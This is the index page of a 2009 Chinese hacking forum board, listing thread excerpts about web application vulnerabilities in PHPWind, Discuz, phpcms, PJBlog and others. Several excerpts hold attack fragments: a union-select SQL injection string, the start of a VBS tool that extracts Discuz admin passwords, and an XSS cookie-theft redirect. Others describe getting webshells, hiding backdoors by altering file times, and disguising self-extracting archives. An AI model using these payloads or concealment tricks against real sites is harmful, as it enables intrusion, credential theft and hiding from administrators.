收藏本版 |訂閲

电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

  • phpwin7.0拿shell的方法
    事发一星期前,在入侵一个PHPWIND论坛时的成果,适用于PHPWIND不能上传,而网上盛传的三种拿SEHLL方法都无效,可以一试,应该算是PHPWIND后台的漏洞 准备工具:winsock专家 v0.6 betan1 一只;UE-32.EXE一只;NC.EXE一只,电脑一台(只见一堆砖头飞过。。。。) 开工了,首先打开winsock 然后启动IE,进入后台,(哪个又在丢砖头。。 ...
    0121 得失有定 发表于 2009-5-24 漏洞分析
  • PHPWIND & DISCUZ! CSRF漏洞
    PHPWIND & DISCUZ! CSRF漏洞影响版本iscuz! 6.0.0 & 6.1.0 & 7.0.0 PHPWIND 6.0 & 6.3 & 7.0漏洞描述HPWIND & DISCUZ!存在CSRF漏洞,引发PHPWIND & DISCUZ! CSRF WORM!http://groups.google.com/group/p ... d/b31e4d2e6270c384#<*参考 http://groups.google.com/group/p ... d/b31e4d2e6270c384# *>安全建议ISCUZ删除templ ...
    062 锐优思环保 发表于 2009-5-24 漏洞分析
  • phpcms2008 注入漏洞
    这个是最新有人发现的 该漏洞文件:ask/search_ajax.php 漏洞说明: /ask/search_ajax.php Code: if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10); /ask/include/answer.class.php Code: function lis ...
    077 木易仁 发表于 2009-5-24 漏洞分析
  • 校内网最新 xss Cookies得到密码
    From:http://t00ls.net/viewthread.php?tid=1323&highlight= 校内网在发blog时对插入图片过滤不严格,存在xss漏洞. 在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码 javascript:window.location.href='http://www.xxx.com/test.<SPAN class=t_tag xxxxx=tagshow(event) href="tag.php?name=php">ph ...
    066 铖大吴英根 发表于 2009-5-24 漏洞分析
  • 微软IIS6漏洞:服务器敏感信息易被窃
    近日,安全专家对使用微软Internet信息服务IIS 6的管理员发出警告,声称Web服务器很容易受到攻击并暴露出密码保护的文件和文件夹。   据悉,基于WebDAV协议的部分进程命令中存在这种漏洞。通过给Web地址添加一些Unicode字符,黑客就可以访问这些敏感文件——这些文件一般都有系统密码保护。另外,该漏洞也可以 ...
    0122 可狱而不可囚 发表于 2009-5-24 漏洞分析
  • Gh0st控制端逻辑漏洞
    严重程度:高威胁程度:控制远程主机错误类型:逻辑错误利用方式:主机模式  受影响系统Gh0st3.6之前所有版本 未影响系统 未知 详细描述Gh0st 发现漏洞一个逻辑漏洞,这些漏洞可以被用户利用,可以从被控端向控制端发送任意文件到任意位置。 测试代码1.控制端先向控制端发送TOKEN_DRIVE_LIST的封包。2.向控制端发送TOK ...
    0123 潘泽廉 发表于 2009-5-24 漏洞分析
  • WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞
    感谢:Iceboy发现此问题并提供DUMP漏洞厂商及产品:Microsoft Windows 7 rc 7100 090421存在漏洞组件:win32k.sys Timestamp :49ee8dc8存在漏洞函数:NtUserGetDc/NtUserGetDcEx 漏洞描述:Win32k.sys是WINDOWS的GDI驱动程序,包含大量复杂的图形界面处理,由于其中大量代码是从WIN3.1中修改过来,因此成了WINDOWS漏洞多发之 ...
    076 劳力 发表于 2009-5-24 漏洞分析
  • 恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞
    影响版本:HoWave V4.1 ASP漏洞描述:在文件inc/ hl_manage.inc中: adminUserId= Request.Cookies("hl_manage")("username")   //第5行……sql_admin="select * from hl_admin where hl_adminuser='" & adminUserId & "'"   //第15行程序没有对从cookies获得的值过滤,导致注入漏洞的产生。 ...
    0125 整天被猫欺负的狗 发表于 2009-5-24 漏洞分析
  • cyask知道系统collect.php页面存在越权漏洞
    影响版本: Cyask 程序介绍: Cyask国内较为多人使用的仿百度风格的Ask系统。 漏洞分析: 从Collect.php代码当中可以看到 else   {     /*   检查网址   */   $url=get_referer();     $neturl=emptyempty($_POST['neturl']) ? trim($_GET[' ...
    0132 暂眷 发表于 2009-5-24 漏洞分析
  • PJBlog个人博客系统Action.asp页面跨站脚本攻击漏洞
    影响版本JBlog 3.0.6.170程序介绍JBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。漏洞分析:在文件Action.asp中:elseif request("action")="type1" then //第23行dim   mainurl,main,mainstrmainurl=request("mainurl")main=tr ...
    088 西游行者 发表于 2009-5-24 漏洞分析
  • PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞
    影响版本JBlog 3.0.6.170程序介绍JBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。漏洞分析:在文件class/cls_logAction.asp中:oldcate=request.form("oldcate") //第429行oldctype=request.form("oldtype")D = conn.execute("select cate ...
    0134 秋枫清 发表于 2009-5-24 漏洞分析
  • 腾讯新漏洞?绕过加密QQ空间
     相信有很多网友都在使用QQ空间,可以利用QQ空间来记录自己的心情。但有的时候自己的QQ空间并不想让其他人知道,那么就需要在QQ空间上设置权限或密码,只有有权限或知道密码的网友才能查看自己的QQ空间。   但现在要小心了,有一款名字为“风很凉QQ加密空间日志查看器”的软件,利用它无需权限,也不用知道对 ...
    080 正顺和 发表于 2009-5-24 业界动态
  • 微软的远程安全访问控制
    远程访问一直是个热门话题,人们需要能够随时随地通过任何设备登录网络获取信息。过去利用特定设备或者特定位置访问网络的时代已经过去了,特别是在企业内,人们希望在任何时候都能获取企业信息,可能使用笔记本、台式机、智能手机或者甚至MP3播放器来获取企业信息。  微软公司就正在为此付出努力,希望能够保证用户随时 ...
    079 稽山寒月 发表于 2009-5-7 其他
  • 防范网页挂马攻击 从对WEB站点进行安全评估开始
    对于一些大型网站来说,通常拥有一整套已经执行了的WEB站点安全防范解决方案,但是,为什么一些网站还是会被攻击者挂载木马?其中一个最主要的原因是已经实施的WEB站点安全解决方案只能够应对已经出现的安全漏洞和威胁。而攻击者总是在通过各种手段来分析网站中可能会存在的弱点或漏洞,以便能够成功绕过网站当前的安全防范 ...
    0119 我是你的光 发表于 2009-5-7 其他
  • 让自解压文件在右键中不显示的实现方法
    自解压文件在右键中不显示 解压到 我们创建自解压文件后就算更改图标,当你右键单击时会显示 解压文件等选项,一看就知道是自解压文件,下面说一种方法让它不显示:    用C32载入搜索十六进制807A0272,把72改成AA,然后再搜索526172211A07,把72改成AA.当然,AA是我的改法,你可以换成其他的. ...
    0163 体育快速报道 发表于 2009-4-20 工具使用
  • php 注入 记录一下
    暴库名\表名\列名 /**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1-- 碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个 ...
    091 学礼 发表于 2009-4-20 入侵防御
  • discuz获取任意管理员密码漏洞利用工具vbs版
    以下是search.inc.php 文件漏洞利用代码VBS版 复制代码代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/f ...
    0109 画卿颜 发表于 2009-4-18 漏洞分析
  • JSP 修改文件时间的WEBSHELL
    JSP 修改文件时间的WEBSHELL 很多网站的管理员通过查看文件的修改时间定位被入侵后流下的网马与后门,因此修改文件的创建与修改时间可以有效的预防后门的泄露。 昨天研究了下,JSP只提供了修改“文件修改时间”的接口,却没有提供修改“文件创建时间”的接口,因此貌似只能修改“文件修改时间 &rd ...
    0133 给我气够呛 发表于 2009-4-18 漏洞分析
  • Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法
    此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码: ' 把带"|"的字符串转为数组 Dim aSavePathFileName aSavePathFileName = Split(sSavePathFileName, "|") ' 删除新闻相关的文件,从文件夹中 Dim i For i = 0 To UBound(aSavePathFileName) ' 按路 ...
    0145 回忆如何抹去 发表于 2009-4-18 漏洞分析
  • 利用XSS渗透DISCUZ 6.1.0实战
    网上关于XSS入侵网站的例子很多,但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程就像主题所说一样,今天测试的论坛是DISCUZ! 6.1.0 目标:卡巴技术论坛 http://kpchina.net http://bbs.kpchina.net工具:无(感觉本人的入侵方式不是很高级,低调,所以不用工具,需要的东西自己 ...
    061 北方的天空下 发表于 2009-4-18 漏洞分析
  • 下一頁 »

    快速發帖

    還可輸入 180 個字符
    您需要登錄後才可以發帖 登錄 | 立即注册

    本版積分規則

    圆梦公社,专注于为全球华人提供纯粹技术交流的地方,请勿发布任何政治及违法的言论。如有相关侵权、举报、投诉及建议等,请发 E-mail:dzh188@hotmail.com

    Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

    在本版发帖返回顶部